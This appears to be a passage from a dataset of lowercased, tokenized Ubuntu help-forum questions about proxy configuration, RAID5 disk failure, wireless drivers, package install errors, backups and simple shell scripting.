/boot/initrd.img-3.5.0-37-generic with 1. dpkg : error processing initramfs-tools ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : linux-image-generic-lts-quantal linux-generic-lts-quantal initramfs-tools
337460	how should i setup the file sharing to access works files from home pc ( vpn is ok )	i have a work computer which is running ubuntu 12.04 and i 'm wondering what method is best for me to be able to view it 's files from home . i will be accessing the files at my workplace through a vpn so firewall issues are not a problem in this case . i would like to be able to have it appear as though i have all my works computers files , but at home . i need to do some development using ide 's from home and it is essential that i am able to navigate to the directory for the sake of the ide . i 've heard of samba shares . is this a good choice , or are there better options out there ? if samba share suits what i want to do i thought the following guide on the ubuntu forums would be ideal : http : //ubuntuforums.org/showthread.php ? t=288534 edit : home computer will be using ubuntu 12.04 as well and the vpn aspect of this is already setup and working . this is a matter of how the sharing should be done .
337463	wget and lynx not working , but apt-get working behind proxy	i have done : export http_proxy= '' http : //proxy.institute.edu:3128/ '' export ftp_proxy= '' ftp : //proxy.institute.edu:3128/ '' export https_proxy= '' https : //proxy.institute.edu:3128/ '' export socks_proxy= '' socks : //proxy.institute.edu:3128/ '' i have done changes in /etc/apt/apt.conf.d/ directory for proxy . apt-get is working , but lynx , wget are not working . how to do using command-line . i have access only through ssh .
337468	unable to execute vlc from php	i am running ubuntu 12.04.3 , 32 bit os on a 8 cpu , 8gb ram 64-bit intel xeon machine . i have installed all backports as well . i have this problem which is eating my head for the last 3 days . i created a play.sh file with the following code ... code : # ! /bin/sh vlc -vvv sasural.ts where sasural.ts is a video file that resides under home and in the same level as apache . i am invoking the .sh file by using the following php code ... code : shell_exec ( 'play.sh ' ) ; i also tried both the exec ( ) / system ( ) methods to invoke the .sh file . whenever i do so , i get the following message ... vlc media player 2.2.0-git weatherwax command line interface initialized . type `help ' for help . > shutting down . play.sh works if i execute it from the terminal command prompt outside of the php code . i guess i am doing something wrong when i invoke it from within php . i have performed the following tasks ... given apache root access linked all folders to apache
337469	slow performance while copying large files to external peripherals	since i upgraded to ubuntu 12.10 , i have been having many problems with external storage devices like hard disk and pen drives . sometimes , my external hdd ( wd passport 500 gb ) is not detected at all , and any files i am transferring that are more than 1 gb stop in the middle or slow down so much that it takes 2 hours just to transfer a file of 2.9 gb . i am facing the same problem with my pen drive if i try to transfer files above 700 mb . i have already disabled all password requirements for my hdd and still does n't get detected regularly .
337471	enable hibernate in ubuntu 13.04 - editing hibernate.pkla does n't work	how do i enable the hibernate option . editing hibernate.pkla does n't work . i did the following - $ sudo gedit /var/lib/polkit-1/localauthority/50-local.d/hibernate.pkla [ enable hibernate ] identity=unix-user : * action=org.freedesktop.upower.hibernate resultactive=yes and restarted , but nothing happens .
337473	add a new target into rules debian file	i want to add a new target rule in debian/rules and i want it to be executed before dpkg-source -- before-build . this new target will generate a control file from a template file . how can i do that ?
337479	how do i communicate with arduino mega 2560 r3 ?	i recently purchased arduino mega , and i 'm tring it to make it communicate with ubuntu 13.04 64bit , without success . at arduino ide the option tools â serial port is grayed out . is there any driver i need to install ?
337487	ubuntu 13 does not recognize keyboard shortcut to control the screen brightness	my ubuntu 13 does not recognize the notebook shortcut to increase or decrease the brightness of the screen . anyone know how i can fix this problem ?
337490	python : need help in installing it in ubuntu 12.04	initially i installed python3.3 from source but then i removed and deleted the directory /usr/lib/python3.3 . when i am installing using aptitude i am getting this error : unpacking python3.3 ( from ... /python3.3_3.3.1-1ubuntu5_i386.deb ) ... processing triggers for man-db ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf-2.index ... processing triggers for desktop-file-utils ... setting up python3.3 ( 3.3.1-1ubuntu5 ) ... python3.3 : ca n't open file '/usr/lib/python3.3/py_compile.py ' : [ errno 2 ] no such file or directory dpkg : error processing python3.3 ( -- configure ) : subprocess installed post-installation script returned error exit status 2 errors were encountered while processing : python3.3 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) a package failed to install . trying to recover : setting up python3.3 ( 3.3.1-1ubuntu5 ) ... python3.3 : ca n't open file '/usr/lib/python3.3/py_compile.py ' : [ errno 2 ] no such file or directory dpkg : error processing python3.3 ( -- configure ) : subprocess installed post-installation script returned error exit status 2 errors were encountered while processing :
337494	find files and pack them using a shell script	i am trying to find all files which size is higher than $ 1 ( parameter ) and zip them using a shell script . # ! /bin/bash find . -type f -size + $ 1c = $ files tar -xf $ files but i think this is n't the right solution .
337499	remote desktop connection	i 'm attempting to connect using windows remote desktop connection . can i make remote desktop connection from other machines to ubuntu 12.04 workstation ?
337500	how to share guest 's internet with host on virtualbox ?	i have a problem that i have been trying to fix over 3 months now , i 'm using ubuntu 12.04 64bit with windows 7 as a guest on virtualbox , i have a usb modem which does n't support linux , the modem works good on the guest but i do n't know how to let the host ( ubuntu ) use that connection , i have searched around the internet and most documents and fixes for how to share host 's connection with guest , not guest with host . beside , i 've found some posts with similar problem but i could n't understand the workarounds , i 'm still beginner . so could anyone provide a step-by-step guide how to share guest 's internet with host ? thanks a lot !
337501	how to create icons on the desktop of ubuntu ?	for example if i download a program , unzip it and how do i install it and make it appear the icon on the launcher or desktop ?
337502	ubuntu 13.04 is not able to access all the sound ports on the motherboard at once	i am using dg43rk motherboard , and it has 10.1 channel audio support ( it has 5 3.5mm jacks at the back ) and a optical s/pdif port also at the back coupled with them . my cpu panel at the front has 2 3.5mm jacks . ubuntu does not access all the ports at once , i.e . it is either accessing headphone or the speaker port one at time . is there a way to configure them all and select them using the panel like it is done on windows 7 instead of switching the ports every time and adjusting the volume levels on the ports ?
337514	no wireless routers are detected on ubunutu 12.10	i am using toshiba satellite c-a50 laptop with atheros ar9565 card . even though the `` wlan0 '' interface is shown in `` ifconfig '' no wireless routers are coming up to check a connection . `` enable wireless '' is ticked in the network connection drop down . `` eth0 '' interface is working fine . i have installed compat-wireless-3.6.8-1-snpc `` ath9k '' driver for the wireless . the `` dmesg '' command in the terminal shows `` [ 1972.160105 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready '' . same atheros wireless card works properly in windows 7 . also kernel version . uname -r result 3.5.0-39-generic i am a beginner in linux please help me out . lshw -c network result . *-network description : wireless interface product : ar9565 wireless network adapter vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:08:00.0 logical name : wlan0 version : 01 serial : 24 : fd:52:4d:50 : dc width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list rom ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.5.0-39-generic firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory : d3400000-d347ffff memory:9fb00000-9fb0ffff *-network description : ethernet interface product : atheros communications inc. vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:09:00.0 logical name : eth0 version : 10 serial : 7c:05:07:87:5c : bc size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm pciexpress msi msix bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=alx driverversion=1.2.3 duplex=full firmware=n/a ip=192.168.4.58 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:18 memory : d1000000-d103ffff ioport:2000 ( size=128 ) lspci result 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200/2nd generation core processor family pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 2 ( rev c4 ) 00:1c.2 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 3 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation hm76 express chipset lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) 01:00.0 3d controller : nvidia corporation device 1140 ( rev a1 ) 08:00.0 network controller : atheros communications inc. ar9565 wireless network adapter ( rev 01 ) 09:00.0 ethernet controller : atheros communications inc. device 10a0 ( rev 10 ) ifconfig result . eth0 link encap : ethernet hwaddr 7c:05:07:87:5c : bc inet addr:192.168.4.58 bcast:192.168.4.255 mask:255.255.255.0 inet6 addr : fe80 : :7e05:7ff : fe87:5cbc/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:9904 errors:0 dropped:0 overruns:0 frame:0 tx packets:4521 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:3059787 ( 3.0 mb ) tx bytes:917645 ( 917.6 kb ) interrupt:18 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:978 errors:0 dropped:0 overruns:0 frame:0 tx packets:978 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:157336 ( 157.3 kb ) tx bytes:157336 ( 157.3 kb ) wlan0 link encap : ethernet hwaddr 24 : fd:52:4d:50 : dc up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b )
337517	uninstall software	i am an absolute newbie to ubuntu . i am running 12.04 64 bit . i installed pdf-editor from tracker software and now i would like to get it off this machine , but i ca n't figure out how to do it . i tried tweak and synaptic but it does n't appear anywhere in those programs . can anyone help ?
337522	screen brightness keys not working	am using a dell n4010 laptop with ubuntu 13.04 installed in it along with windows 8 ( dual boot ) . the screen brightness keys are not working.does anyone have the answer
337523	automatic switching between monitor configurations	i have a laptop and an external monitor and i was wondering if there was a simple approach to switching between multiple monitor configurations based on the detected available displays . for example : when i am at home and i plug in my external monitor i would like this to automatically become enabled and the laptop screen to become disabled . as soon as i pull out the display cable for the external monitor , i would like the laptop screen to automatically become enabled . i was expecting this to just `` work '' just like it does in windows - but it seems to be much harder than that . i am aware of the xrandr command to turn displays on and off but i can not seem to find a way to get this to work the way i describe above . i had also found this post about switching between multiple monitor configurations and the results seem a bit inconclusive . however i was hoping that with xrandr there would be a simpler solution . for me , the fact that when i pull out my external monitor the screen just goes black and i get an error message is a big issue holding me back from making the complete switch to linux as i move around alot as a student . my os of choice is currently kubuntu 12.04 but i am willing to change to something else if it provides a better way of setting up the described setup .
337527	hp pavilion g6 numpad not working in ubuntu 13.04	i have just done a fresh install of ubuntu 13.04 on a hp pavilion g6 and having a little bit of difficulty getting ubuntu to recognise the numpad . so far i have tried running numlockx on with no luck and also looked at changing the keyboard layout but i just ca n't seem to get it to work . what seems to be happening is the numlock works but the numbers on the numpad and the surrounding characters do not . i even tried checking xev but even that did n't pick anything on the numpad other than the numlock . please could someone help as i am running out of ideas !
337531	admin no longer has access to shared folder	so over the weekend i arrive to work , boot my pc and run the virtualbox session of ubuntu but now i get the message : the folder contents could not be displayed you do not have the permissions necessary to view the contents of `` sf_virtual '' i do n't understand what could have happened ? i did install an update and read an article to re-install guest additions and it still does n't allow access in /media . when i do gksudo nautilus and then sudo ls -al /media/sf_virtual it will display all the files in virtual as -rwxrwx -- - 1 root vboxsf numbers month date time filename . when i am under name in the terminal ls /media/sf_virtual it returns permission denied . any ideas on how to get access back ? i have removed the shared folders and added new ones but it still does n't work .
337532	slow performance in ubuntu and sometimes stuck	i recently installed ubuntu 13.04 i386 and everything works fine expect the speed of my os performance . i had windows 7 before and everything works great but after i installed linux when i login to my account i do n't know why sometimes it is stuck or has low speed . pc details : lenovo 3000 n100 cpu core 2 due 1.6 ghz ram : 2 gb graphic : 1 gb geforce 7200 hdd : seagate sata 500 gb thanks guys .
337539	clear track not found tags in banshee	banshee sometimes marks tracks as missing or not found . i would like to be able to clear all the `` missing '' or `` not found '' tags in one fell swoop . i have included a screenshot of one such track . any suggestions ?
337541	how to recover partially formatted ext4 partition ( testdisk did not help )	i have đ° 2tb `` single ext4-formatted partition '' hdd . recently , while working under windows 7 on the same machine , i have damaged the aforementioned partition . what happened is that while i was trying to recover external usb drive i opened standard windows disk-management tool and it prompted me if i want to make disk1 `` active '' . at that moment i did n't realize that `` disk1 '' is not my usb disk , but the ext4 internal disk . after clicking ok , windows has created 100 mb `` system reserved partition '' on the disk and left the rest untouched.. ? when i logged back to linux , the partition was not mounted . i deleted created by windows 100mb ntfs `` system reserved partition '' and tried to run testdisk . testdisk sees my old ext4 partition , but at the end tells something like `` no partition can be recovered '' . is it possible to get back my partition and directory-structure + data ? the problem is that i had there all my programs ( c/c++ ) and working directories as well as some experimental data i.e . files which do n't have specific headers like jpg or pdf ... is there a way to recover these data ? can i , for instance , recover part of the partition ? let 's say , whatever is above 100mb ? thanks in advance ! p.s . please let 's avoid `` you should have done a backup '' -like comments.. : ) i had a backup , but it was stored on the usb drive which i was trying to recover first.. ( a general disk failure , disk is not readable ) .
337542	hard drive in software raid5 dissapeared	i have 6 hdds in my box , 2x256gb ata ocz-agility4 ssds . each is partitioned into one block of 48gb and one block of 208gb . the 48gb partitions are raid0 striped and serve as the swap space ( md0 ) . the 208gb partitions are raid1 striped and serve as the / file system ( md1 ) . there are also 4x3.0tb ata st3000dm001-9yn166 drives each with one partition , those 4 partitions are raid5 striped ( md128 ) . all are ext4 formatted running ubuntu 12.04 server . sda and sdb are the ssds , while sdc , sdd , sde , and sdf are the hdds . randomly ( as far as i can tell ) md128 became read only . the sys log looks like this for the event : aug 23 16:25:24 crick kernel : [ 617040.416257 ] ata4.00 : exception emask 0x0 sact 0x1f serr 0x0 action 0x0 aug 23 16:25:24 crick kernel : [ 617040.416260 ] ata4.00 : irq_stat 0x40000008 aug 23 16:25:24 crick kernel : [ 617040.416262 ] ata4.00 : failed command : read fpdma queued aug 23 16:25:24 crick kernel : [ 617040.416265 ] ata4.00 : cmd 60/08:08:00 : af : cc/00:00:9c:00:00/40 tag 1 ncq 4096 in aug 23 16:25:24 crick kernel : [ 617040.416265 ] res 41/40:08:00 : af : cc/00:00:9c:00:00/00 emask 0x409 ( media error ) < f > aug 23 16:25:24 crick kernel : [ 617040.416266 ] ata4.00 : status : { drdy err } aug 23 16:25:24 crick kernel : [ 617040.416267 ] ata4.00 : error : { unc } aug 23 16:25:24 crick kernel : [ 617040.417510 ] ata4.00 : configured for udma/133 aug 23 16:25:24 crick kernel : [ 617040.417527 ] sd 3:0:0:0 : [ sdd ] unhandled sense code aug 23 16:25:24 crick kernel : [ 617040.417528 ] sd 3:0:0:0 : [ sdd ] aug 23 16:25:24 crick kernel : [ 617040.417529 ] result : hostbyte=did_ok driverbyte=driver_sense aug 23 16:25:24 crick kernel : [ 617040.417530 ] sd 3:0:0:0 : [ sdd ] aug 23 16:25:24 crick kernel : [ 617040.417531 ] sense key : medium error [ current ] [ descriptor ] aug 23 16:25:24 crick kernel : [ 617040.417533 ] descriptor sense data with sense descriptors ( in hex ) : aug 23 16:25:24 crick kernel : [ 617040.417534 ] 72 03 11 04 00 00 00 0c 00 0a 80 00 00 00 00 00 aug 23 16:25:24 crick kernel : [ 617040.417538 ] 9c cc af 00 aug 23 16:25:24 crick kernel : [ 617040.417540 ] sd 3:0:0:0 : [ sdd ] aug 23 16:25:24 crick kernel : [ 617040.417541 ] add . sense : unrecovered read error - auto reallocate failed aug 23 16:25:24 crick kernel : [ 617040.417542 ] sd 3:0:0:0 : [ sdd ] cdb : aug 23 16:25:24 crick kernel : [ 617040.417543 ] read ( 10 ) : 28 00 9c cc af 00 00 00 08 00 aug 23 16:25:24 crick kernel : [ 617040.417547 ] end_request : i/o error , dev sdd , sector 2630659840 aug 23 16:25:24 crick kernel : [ 617040.417550 ] md/raid : md128 : read error not correctable ( sector 2630657792 on sdd1 ) . aug 23 16:25:24 crick kernel : [ 617040.417552 ] md/raid : md128 : disk failure on sdd1 , disabling device . aug 23 16:25:24 crick kernel : [ 617040.417552 ] md/raid : md128 : operation continuing on 2 devices . aug 23 16:25:24 crick kernel : [ 617040.417563 ] ata4 : eh complete aug 23 16:25:25 crick kernel : [ 617040.455605 ] raid conf printout : aug 23 16:25:25 crick kernel : [ 617040.455609 ] -- - level:5 rd:4 wd:2 aug 23 16:25:25 crick kernel : [ 617040.455610 ] disk 0 , o:1 , dev : sdc1 aug 23 16:25:25 crick kernel : [ 617040.455611 ] disk 1 , o:0 , dev : sdd1 aug 23 16:25:25 crick kernel : [ 617040.455612 ] disk 2 , o:1 , dev : sde1 aug 23 16:25:25 crick kernel : [ 617040.489941 ] raid conf printout : aug 23 16:25:25 crick kernel : [ 617040.489945 ] -- - level:5 rd:4 wd:2 aug 23 16:25:25 crick kernel : [ 617040.489947 ] disk 0 , o:1 , dev : sdc1 aug 23 16:25:25 crick kernel : [ 617040.489948 ] disk 2 , o:1 , dev : sde1 a slew of : aug 23 16:25:25 crick kernel : [ 617040.539926 ] buffer i/o error on device md128 , logical block 986401023 with different block addresses then aug 23 16:25:25 crick kernel : [ 617040.539929 ] ext4-fs warning ( device md128 ) : ext4_end_bio:248 : i/o error writing to inode 42993727 ( offset 11551637504 size 524288 starting block 986400896 ) aug 23 16:25:25 crick kernel : [ 617040.541690 ] jbd2 : detected io errors while flushing file data on md128-8 aug 23 16:25:25 crick kernel : [ 617040.541707 ] aborting journal on device md128-8 . aug 23 16:25:25 crick kernel : [ 617040.541720 ] ext4-fs error ( device md128 ) in ext4_free_blocks:4702 : journal has aborted aug 23 16:25:25 crick kernel : [ 617040.541727 ] buffer i/o error on device md128 , logical block 1098416128 aug 23 16:25:25 crick kernel : [ 617040.541729 ] lost page write due to i/o error on md128 aug 23 16:25:25 crick kernel : [ 617040.541734 ] buffer i/o error on device md128 , logical block 0 aug 23 16:25:25 crick kernel : [ 617040.541736 ] lost page write due to i/o error on md128 aug 23 16:25:25 crick kernel : [ 617040.541740 ] jbd2 : error -5 detected when updating journal superblock for md128-8 . aug 23 16:25:25 crick kernel : [ 617040.541743 ] ext4-fs ( md128 ) : delayed block allocation failed for inode 49152114 at logical offset 994912 with max blocks 2048 with error -30 aug 23 16:25:25 crick kernel : [ 617040.541745 ] ext4-fs ( md128 ) : this should not happen ! ! data will be lost aug 23 16:25:25 crick kernel : [ 617040.541745 ] aug 23 16:25:25 crick kernel : [ 617040.541806 ] ext4-fs ( md128 ) : previous i/o error to superblock detected aug 23 16:25:25 crick kernel : [ 617040.542518 ] ext4-fs error ( device md128 ) in ext4_da_writepages:2390 : journal has aborted aug 23 16:25:25 crick kernel : [ 617040.542526 ] jbd2 : detected io errors while flushing file data on md128-8 aug 23 16:25:25 crick kernel : [ 617040.542529 ] buffer i/o error on device md128 , logical block 0 aug 23 16:25:25 crick kernel : [ 617040.542531 ] lost page write due to i/o error on md128 aug 23 16:25:25 crick kernel : [ 617040.542798 ] ext4-fs error ( device md128 ) : ext4_journal_start_sb:371 : detected aborted journal aug 23 16:25:25 crick kernel : [ 617040.542810 ] ext4-fs ( md128 ) : remounting filesystem read-only aug 23 16:25:25 crick kernel : [ 617040.542815 ] ext4-fs ( md128 ) : previous i/o error to superblock detected aug 23 16:25:25 crick kernel : [ 617040.542835 ] ext4-fs ( md128 ) : i/o error while writing superblock aug 23 16:25:25 crick kernel : [ 617040.542838 ] ext4-fs ( md128 ) : ext4_da_writepages : jbd2_start : 15984 pages , ino 49152114 ; err -30 aug 23 16:25:25 crick kernel : [ 617040.544887 ] ext4-fs error ( device md128 ) : ext4_journal_start_sb:371 : detected aborted journal when i use the disk utility or gparted sdf is gone , it 's not even detected anymore . as such md128 is degraded . first thing i did was unmount it through the disk utility , then i tried seeing if anything else could find it : fdisk -l disk /dev/sda : 256.1 gb , 256060514304 bytes 255 heads , 63 sectors/track , 31130 cylinders , total 500118192 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000a88fe device boot start end blocks id system /dev/sda1 406368256 500117503 46874624 fd linux raid autodetect /dev/sda2 2046 406368255 203183105 5 extended /dev/sda5 2048 406368255 203183104 fd linux raid autodetect partition table entries are not in disk order disk /dev/md0 : 96.0 gb , 95998181376 bytes 2 heads , 4 sectors/track , 23437056 cylinders , total 187496448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 524288 bytes / 1048576 bytes disk identifier : 0x00000000 disk /dev/md0 does n't contain a valid partition table disk /dev/md1 : 207.9 gb , 207925149696 bytes 2 heads , 4 sectors/track , 50762976 cylinders , total 406103808 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/md1 does n't contain a valid partition table disk /dev/sdb : 256.1 gb , 256060514304 bytes 255 heads , 63 sectors/track , 31130 cylinders , total 500118192 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000b0740 device boot start end blocks id system /dev/sdb1 * 406368256 500117503 46874624 fd linux raid autodetect /dev/sdb2 2046 406368255 203183105 5 extended /dev/sdb5 2048 406368255 203183104 fd linux raid autodetect partition table entries are not in disk order warning : gpt ( guid partition table ) detected on '/dev/sdc ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sdc : 3000.6 gb , 3000592982016 bytes 255 heads , 63 sectors/track , 364801 cylinders , total 5860533168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdc1 1 4294967295 2147483647+ ee gpt partition 1 does not start on physical sector boundary . disk /dev/md128 : 9001.4 gb , 9001370124288 bytes 2 heads , 4 sectors/track , -2097367168 cylinders , total 17580801024 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 524288 bytes / 1572864 bytes disk identifier : 0x00000000 disk /dev/md128 does n't contain a valid partition table warning : gpt ( guid partition table ) detected on '/dev/sde ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sde : 3000.6 gb , 3000592982016 bytes 255 heads , 63 sectors/track , 364801 cylinders , total 5860533168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sde1 1 4294967295 2147483647+ ee gpt partition 1 does not start on physical sector boundary . warning : gpt ( guid partition table ) detected on '/dev/sdd ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sdd : 3000.6 gb , 3000592982016 bytes 255 heads , 63 sectors/track , 364801 cylinders , total 5860533168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdd1 1 4294967295 2147483647+ ee gpt partition 1 does not start on physical sector boundary . cat /etc/fstab # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/md127 during installation uuid=b63b7341-0b85-40ed-a67b-acfe4f65f563 / ext4 errors=remount-ro 0 1 # /genome was on /dev/md128 during installation uuid=bd6b54be-12ca-479d-879e-8d788fa9d039 /genome ext4 defaults 0 2 # swap was on /dev/md126 during installation uuid=0470550a-6e92-485d-ad41-665c3f313287 none swap sw 0 0 ~ # cat /proc/mdstat personalities : [ linear ] [ multipath ] [ raid0 ] [ raid1 ] [ raid6 ] [ raid5 ] [ raid4 ] [ raid10 ] md128 : active raid5 sde1 [ 2 ] sdc1 [ 0 ] 8790400512 blocks super 1.2 level 5 , 512k chunk , algorithm 2 [ 4/2 ] [ u_u_ ] md1 : active raid1 sdb5 [ 1 ] sda5 [ 0 ] 203051904 blocks super 1.2 [ 2/2 ] [ uu ] md0 : active raid0 sdb1 [ 1 ] sda1 [ 0 ] 93748224 blocks super 1.2 512k chunks unused devices : < none > ~ # mdadm -- detail -- scan array /dev/md/0 metadata=1.2 name=crick:0 uuid=d0d08eab : a7e54021:25973acb:10dd5fba array /dev/md/1 metadata=1.2 name=crick:1 uuid=e2774945:5b3ee3eb:2ad9390f:35153b82 array /dev/md/128 metadata=1.2 name=crick:128 uuid=345cb755:0ae1c919 : d98a45ca:1baf3364 this is where my understanding of linux is not the greatest though . from what i can tell the array superblock sees the uuid for sdf that it was built on , but ( for whatever reason ) sdf is n't being detected . this means that the raid array is broken and so ubuntu set the file system to ro as a safety precaution . i can still open , edit , and create files on / with no issue , the os still runs perfectly , i just ca n't access the data on md128 . i have n't turned off the machine yet to remove the drive to see if it 's failed or not . about a week ago the same issue ( random switch to ro ) occured , only that time it hit md1 ( the ssds ) . when that happened the superblock was erased on md128 . i got lucky when reinstalling the os and had it rebuild the raid using the existing partitions ( ie did n't format the partitions ) , and managed to recover 99.9 % of the data ( the files that were being accessed when it happened were corrupted ) . is the current issue with md128 a problem that i managed to band-aid over until now or is this a sign of some deeper issue that i should be worried about ? what is the best way to move on from here : replace sdf and restripe into md128 , replace sdf and tear down/rebuild md128 , or something else ? edit : sorry for the op , i 'm new to the forum and did n't read the formatting instructions , i 've corrected it now
337543	after adding .sh file to profile.d , desktop background does can not change , ca n't mount other partitions , and ca n't access trash	so i was configuring my jdk and appending my path variable , and i put the script to do that in profile.d : # ! /bin/bash java_home= [ where i had the jdk installed ] path= $ java_home/bin : $ path export path java_home export classpath= . i logged back in , and now i ca n't change my background from the default ( it changed back ) , ca n't access the trash , and ca n't mount my window $ partition ( to access those files ) . anyone know what to do here ?
337546	before you login you must answer me these questions 3 ?	i have two kids that love ubuntu so much so that they are not doing their math homework . so in the spirit of monty python , i would like to present them with something like : '' stop . who would cross the bridge of death must answer me these questions three , ere the other side he see . '' at the login in . they would have to solve a few math problems before they can login . my question is : can this type of thing be done ?
337547	how to use arithmetic expressions in the terminal ?	why i 'm getting the following weird results ? echo & ( ( 5/3 ) ) [ 5 ] 6733 [ 4 ] done echo echo & ( ( 2 + 9 ) ) [ 6 ] 6734 [ 5 ] done echo echo & ( ( 3 + 99 ) ) [ 7 ] 6735 [ 6 ] done echo echo & ( ( 55 - 44 ) ) [ 8 ] 6736 [ 7 ] done echo
337551	backing up multiple accounts	ubuntu 13.04 x64 i have recently set up my pc with multiple users ( my own account and 3 additional standard accounts ) as i have a habit of doing a fresh install every 6 months i always like to ensure my backup is up-to date ( i am using the deja-dup backup tool ) having never restored from a backup with multiple users before i would just like some clarity on how it will work or if indeed i am doing it correctly . the folder i have backed up is /home as it contains the home folders of each user , so the question is when i do a fresh install ( probably in october when 13.10 is released ) and restore from backup will it create the additional user accounts , or will i first have to create the user accounts then restore . or should i do a separate backup for each account or something completely different ?
337566	video dead after upgrading nvidia drivers 12.04	i dual boot windows and ubuntu . i had a nice setup which i 've been using for a couple weeks now . i decided to put steam on the ubuntu side and it said , hey , you can get newer video drivers . i was on 304 i think , and the os recommended 311 . i downloaded and installed the new drivers . it says to reset , so i log out , but then all i have is a blinking cursor instead of the login screen ( where i would have reset from . ) i waited 30 minutes and nothing happened so i reset via holding the power button . now when i boot i do n't even see the asus splash screen . also , if i wait until i know grub is loaded and scroll down to windows ( by memory , video is dead ) i know it starts because i hear that dumb chimey sound , but still no video . i 'm not that great at computers , and given i have no video to work with , i can only give information from memory . i 've tried all my dvi and hdmi ports to no avail . i have a 660ti . i know its not much to go on , i 'm just casting a net here .
337568	wireless network suddenly not working on 13.04	i installed ubuntu 13.04 few days ago and it worked fine . i did some tweaks with my ssd and other things including wlan cards power management . i 'm afraid i did something wrong while tweaking because tonight when i booted the computer again , wireless network did n't work any more . i 'm not new with ubuntu but i 've never learned much about the system so i do n't even know what codes to include in this message . driver is broadcom bcm43228 and it 's ticked in software & updates iwconfig : eth0 no wireless extensions . eth1 ieee 802.11abg essid : off/any mode : managed access point : not-associated retry long limit:7 rts thr : off fragment thr : off power management : off lo no wireless extensions . edit : i 'm not actually sure if the wireless works but i ca n't find any wi-fi connections . i looked at the bios of my computer ( lenovo thinkpad e530 ) and i found something odd . wireless lan radio `` off '' and i could n't change it on . this has something to do with my problem ?
337573	how can i copy all files which starts with `` b '' or `` b '' from /bin to a specific folder ?	how can i copy all files which starts with `` b '' or `` b '' from /bin to a specific folder ? i tried cp /bin* b , but i did n't succeed .
